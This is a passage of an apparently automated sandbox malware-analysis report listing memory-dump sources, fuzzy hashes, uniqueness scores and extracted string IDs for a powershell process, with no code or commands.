                                                            • Instruction Fuzzy Hash: CD3118B4A0020A9FCB15CF59C5849AEFBF1FF48320B258699E518EB755C731EC51CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 36c9d6cd484b001da491142b18d7b04cdb9d8dd0770ff4c9aa43835c5a424a14
                                                            • Instruction ID: 6ec7eb3db0fc502f5d518d880bd76e89be06913fe14affb70bf829de08ac6c12
                                                            • Opcode Fuzzy Hash: 36c9d6cd484b001da491142b18d7b04cdb9d8dd0770ff4c9aa43835c5a424a14
                                                            • Instruction Fuzzy Hash: E721BEB27043696BD7200B7A8801B776FD55FC5700F148457E849CF2D2D97AC98A83B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2313576039.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2313576039.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2313576039.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$TQcq$TQcq$TQcq$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-3025741253
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$XRcq$XRcq$XRcq$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-2758755434
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-788909730
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-3865595929
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                            • API String ID: 0-2461640029
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                            • API String ID: 0-3997570045
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                            • API String ID: 0-3272787073
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                            • API String ID: 0-3272787073
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                            • API String ID: 0-3997570045
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                            • API String ID: 0-1420252700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: XRcq$XRcq$tP^q$$^q
                                                            • API String ID: 0-3596674671
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $^q$$^q$$^q$$^q
                                                            • API String ID: 0-2125118731
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $^q$$^q$$^q$$^q
                                                            • API String ID: 0-2125118731
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                            • API String ID: 0-2049395529
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%